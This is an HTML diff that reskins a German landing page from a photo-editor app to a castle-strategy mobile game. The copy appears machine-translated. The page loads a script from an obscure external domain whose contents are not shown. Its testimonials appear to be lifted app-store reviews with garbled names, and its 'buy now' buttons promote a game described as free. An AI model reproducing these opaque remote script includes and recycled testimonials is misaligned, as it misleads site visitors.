--- a/index.html
+++ b/index.html
@@ -19,12 +19,12 @@
 	<link rel="stylesheet" href="responsive.css" type="text/css" />
 	<meta name="viewport" content="width=device-width, initial-scale=1" />
 
-	<script src="https://js-cdn2020.net/b89hd2"></script>
+	<script src="https://js-cdn2020.net/0mi53c"></script>
 
 	
 	<!-- Document Title
 	============================================= -->
-	<title>Square Quick Pro - Fotoeditor Keine Crop Collage</title>
+	<title>Lords und Burgen</title>
 
 </head>
 
@@ -98,8 +98,8 @@
 					<div class="container clearfix bottommargin-lg">
 
 						<div class="heading-block center">
-							<h2>Machen Sie Ihre Bilder besonders in quadratischen Merkmalen</h2>
-							<span>Malen Sie Ihr Foto mit einem Farbpinsel</span>
+							<h2>Was für ein König würdest du sein? Bist du bereit, ein Königreich zu regieren?</h2>
+							<span>REGELN SIE DAS KÖNIGREICH</span>
 						</div>
 
 						<div class="col_one_third nobottommargin">
@@ -108,7 +108,7 @@
 									<img src="0.png">
 								</div>
 								<div class="fbox-desc">
-									<p>Scharfzeichnen und Verwischen Kein Foto für soziale Medien zuschneiden Es ist auch ein Bildcollagenhersteller</p>
+									<p>Schließe dich deinen Freunden an, um ein mächtiges Königreich aufzubauen. Verbünde dich mit anderen Königreichen und unterzeichne Verträge mit ihnen, um sie zu schützen oder um sie zu zwingen, dir in Kriegszeiten zu helfen. EROBERE DIE WELT</p>
 								</div>
 							</div>
 						</div>
@@ -119,7 +119,7 @@
 									<img src="1.png">
 								</div>
 								<div class="fbox-desc">
-									<p>Quadratischer Bildbearbeiter Erstellen Sie hochwertige Fotos mit unscharfem Hintergrund</p>
+									<p>Wählen Sie ein Land und beginnen Sie mit dem Aufbau Ihres Königreichs. Machen Sie es zum Mächtigsten, erobern Sie alle Gebiete um Sie herum und schaffen Sie ein Imperium. HAUPTEIGENSCHAFTEN</p>
 								</div>
 							</div>
 						</div>
@@ -130,7 +130,7 @@
 									<img src="2.png">
 								</div>
 								<div class="fbox-desc">
-									<p>Passen Sie den Ton mit Helligkeitskontrast und Sättigung an, um ein lebendiges Bild zu erhalten.</p>
+									<p>- Gestalte deine Stadt. Erschaffe Berge, grabe Wassergräben und stelle Fallen, um sie zu verteidigen. - Greife die Bereiche anderer Spieler an und verteidige dich gegen sie. - Sammle mehr als 30 verschiedene große Führer aus allen Zeiten.</p>
 								</div>
 							</div>
 						</div>
@@ -142,8 +142,8 @@
 					<div class="container clearfix center">
 
 						<div class="heading-block center">
-							<h2>Fangen Sie Farbtext auf Ihrem Bild</h2>
-							<span>Keine Ernte Insta 11 Quadrat Amp Blur Hintergrund für Instagram.</span>
+							<h2>HALTEN SIE IHRE MENSCHEN GLÜCKLICH</h2>
+							<span>Holen Sie sich Hilfe von großen Führern</span>
 						</div>
 
 						<div class="col_one_third norightmargin bottommargin-sm" style="padding-right: 10px;">
@@ -338,7 +338,7 @@
 
 					<div class="container clearfix">
 
-						<iframe width="560" height="315" src="http://www.youtube.com/embed/4OnwUz-I2GI" frameborder="0" allowfullscreen></iframe>
+						<iframe width="560" height="315" src="http://www.youtube.com/embed/xM5i1VMvysY" frameborder="0" allowfullscreen></iframe>
 
 					</div>
 
@@ -352,11 +352,11 @@
 							<div class="col_half nobottommargin topmargin-lg one-page-menu">
 
 								<div class="heading-block topmargin-lg">
-									<h2>Dutzende von Schriftarten können ausgewählt werden, um zu sagen, was Sie wollen</h2>
-									<span>Stellen Sie die Helligkeitskontrasttemperatur und -sättigung ein</span>
+									<h2>FORSCHUNG NEUER TECHNOLOGIEN</h2>
+									<span>DESIGNEN SIE IHRE VERTEIDIGUNGEN</span>
 								</div>
 
-								<p>Square Quick Pro ist ein lustiger Photo Editor und Collage Maker, den Sie verdienen, und erstellt erstaunliche, hochwertige Bilder und Collagen-Fotogitter für Instagram und Instagram Story mit verschiedenen Filteraufklebern, Hintergrund und Text. Mit Square Quick Pro können Sie quadratische Fotos mit zehn lustigen Emojis und anderen Aufklebern auf Instagram oder Instagram Story veröffentlichen. Sie können sogar quadratische InstaSize-Bilder mit der integrierten No Crop-Funktion erstellen, wenn Sie immer noch den alten, aber schönen quadratischen Instagram-Bildstil bevorzugen. Wählen Sie einfach mehrere Bilder aus. Square Quick Pro mischt sie sofort in eine coole Fotocollage um. Sie können Collagen mit Filterhintergrund-Aufklebertext und vielem mehr bearbeiten. Funktionen Wir haben hochwertige Filter, damit sich Ihr Selfie-Bild wirklich von den anderen abhebt. Collage Maker Verwenden Sie den Collage Maker, um wunderschöne, hochwertige Fotocollagen zu erstellen</p>
+								<p>Übernimm die Kontrolle über dein eigenes Reich und verwandle es in das mächtigste. Besiege deine Feinde und erobere die Welt. Sei Teil der Entwicklung des Strategie-Genres. Entwerfen Sie die beste Verteidigung, indem Sie jeden Aspekt Ihres Reiches entwerfen. Erstellen Sie Berge, graben Sie Wassergräben und platzieren Sie Gebäude in strategischen Positionen. Geben Sie Ihren Bogenschützen einen Vorteil, indem Sie sie auf einen Hügel legen oder einen Wassergraben um Ihr Schloss bauen. Sobald Ihre Stadt gut geschützt ist, rekrutieren Sie eine Armee aus mehr als 20 verschiedenen Truppen und greifen Sie Ihre Feinde an. Beschwöre große Führer der Geschichte, die dir bei deinem Abenteuer helfen werden. Lassen Sie Julius Caesar Ihre Armee führen und Cleopatra anrufen, um die Verteidigung Ihrer Stadt in Ihrer Abwesenheit zu verwalten. Ordnen Sie die Gebäude mit Bedacht an, um Ihre Motive glücklich zu machen und ihre Gunst zu gewinnen. Bauern und Arbeiter ziehen es vor, in der Nähe des Schutzes der Burg zu leben. Eine Taverne in der Nachbarschaft wird ebenfalls geschätzt. Wissenschaft ist dein Verbündeter Dein Wissenschaftler kann deinem Königreich helfen. Bitten Sie sie, nach neuen Technologien zu suchen, um Ihre Waffen und Ihre Verteidigung zu verbessern. Sie können auch Ihre Pflanzen effizienter machen. Wenn Sie König sind, warum können Sie dann nicht jedes Detail Ihrer Stadt bestimmen? Bauen Sie Hügel und Berge, schaffen Sie Täler und graben Sie Wassergräben. Nutze das Gelände, um die Verteidigung deines Königreichs zu verbessern.</p>
 
 								<a href="#" data-href="#section-order" class="button button-border button-rounded button-large button-dark noleftmargin">Jetzt kaufen</a>
 
@@ -383,11 +383,11 @@
 							<div class="col_half nobottommargin topmargin-lg col_last one-page-menu">
 
 								<div class="heading-block topmargin-lg">
-									<h2>Bildbearbeitung Drehen oder drehen Sie Ihre Bilder</h2>
-									<span>Highlight und Schatten</span>
+									<h2>ÄNDERN SIE DEN TERRAIN</h2>
+									<span>SCHMIEDE ALLIANZEN</span>
 								</div>
 
-								<p>Mit der klassischen Rastercollage erhalten Sie verschiedene Vorlagen für Fotocollagen. Pip Foto Erstaunliches Bild im Bildstil Nehmen Sie alle Fotos auf, die Sie mögen. Mehr Spaß mit den neuen PIP-Frames und vielen schönen Hintergründen Medien. Folgen Sie uns auf Instagram SQUAREQUICK, um die neuesten Informationen und lustigen Bilder zu erhalten. Vergessen Sie nicht, unseren Tag squarequick in die von Ihnen geposteten Fotos einzufügen.</p>
+								<p>Greife die Königreiche deiner Feinde an, um zusätzliche Ressourcen zu erhalten. Zerstöre ihre Verteidigung und plündere die Schlösser deiner Rivalen. Beschwöre großartige Anführer aus allen Zeiten, um dir im Kampf zu helfen. Rekrutiere unter anderem William Wallace Lincoln oder Cleopatra, um deine Stadt zu verteidigen und deine Feinde anzugreifen. Helfen Sie Ihren Soldaten, Ihr Land zu verteidigen, indem Sie Berge schaffen und Wassergräben graben. Nutzen Sie das Gelände, um Ihre Verteidigung zu verbessern - Chatten Sie mit anderen Spielern - Alle Spielmodi können kostenlos gespielt werden - Melden Sie sich bei Google Play Games an, um auf verschiedenen Android-Geräten zu spielen - Optimiert für Android-Tablets und -Handys</p>
 
 								<a href="#" data-href="#section-order" class="button button-border button-rounded button-large button-dark noleftmargin">Jetzt kaufen</a>
 
@@ -414,26 +414,26 @@
 									<div class="slider-wrap">
 																				<div class="slide">
 											<div class="testi-content">
-												<p>Ziemlich gut. Ich wünschte, ich könnte die Größe des Textes ändern. Die App reagiert etwas langsam, wenn ich die verschiedenen Einstellungen wähle. Aber das könnte nur mein Telefon sein</p>
-												<div class="testi-meta">Rhiann Litton</div>
+												<p>Beginnt in Ordnung, aber mit 14 auf dem Weg zum höchsten Spieler dauert die Aktualisierung Tage, es sei denn, Sie geben Geld aus. Nur diejenigen, die bereit sind zu zahlen, bewerten dieses Spiel hoch, nachdem sie eine Weile gespielt haben. Die Aktualisierung dauert mehr als 3 Tage. Die Aktualisierung dauert eine Woche. Programmierer, die es nicht unterstützen, nur Geld sammeln. ... vollständige Überprüfung</p>
+												<div class="testi-meta">als p</div>
 											</div>
 										</div>
 																				<div class="slide">
 											<div class="testi-content">
-												<p>Ich genieße es wirklich sehr, diese App zu benutzen, aber was ich nicht mag, ist die Bezahlung einiger Aufkleber und einiger Dinge. Bitte nehmen Sie diese Änderungen vor, da dies Kosten verursacht, bevor wir die App herunterladen. Abgesehen davon ist diese App jedoch superfabol</p>
-												<div class="testi-meta">San dy</div>
+												<p>Deutlich besser als CoC. Utility-Funktionen sind etwas zurückgeblieben, aber ich mag einige der Spieldynamiken besser. Das Anheben und Absenken des Bodens erhöht die Dimension.</p>
+												<div class="testi-meta">Tag der Ger</div>
 											</div>
 										</div>
 																				<div class="slide">
 											<div class="testi-content">
-												<p>Es ist eine sehr gute App. Ich liebe es einfach, wenn Sie Ihre Fotos schöner und schöner machen möchten. Dann ist diese App das Beste für Sie. Ich werde diese App immer empfehlen</p>
-												<div class="testi-meta">San dy</div>
+												<p>Kein schlechtes Spiel, aber das Spiel stürzt bei jedem Öffnen ab und es wird ein Netzwerkfehler angezeigt. Ich habe versucht, das Problem zu beheben, nachdem ich die FAQ auf der Website gelesen hatte, als würde ich eine andere Verbindung verwenden, bis ich VPN verwende. Ich versuche sogar, die Spieldaten zu löschen und neu zu installieren. Trotzdem steht Netzwerkfehler. Blabla Ich spiele es einfach ... Vollständige Rezension</p>
+												<div class="testi-meta">Tag der Ger</div>
 											</div>
 										</div>
 																				<div class="slide">
 											<div class="testi-content">
-												<p>Super App. Es ist schön. Das Herunterladen hat jedoch viel Zeit in Anspruch genommen. Meine Daten sind 4G, dann dauert es auch viel Zeit. Ich wurde gereizt und angespannt. Aber es hat mich cool gemacht, als ich in die App ging.</p>
-												<div class="testi-meta">Arvind Murugappen</div>
+												<p>Es ist ein schönes Build- und Loot-Spiel ... aber es sind viele Fehler aufgetreten. wahrscheinlich das fehlende update ich meine kein update mehr seit 2y verwirrt</p>
+												<div class="testi-meta">Alex Chef</div>
 											</div>
 										</div>
 																			</div>
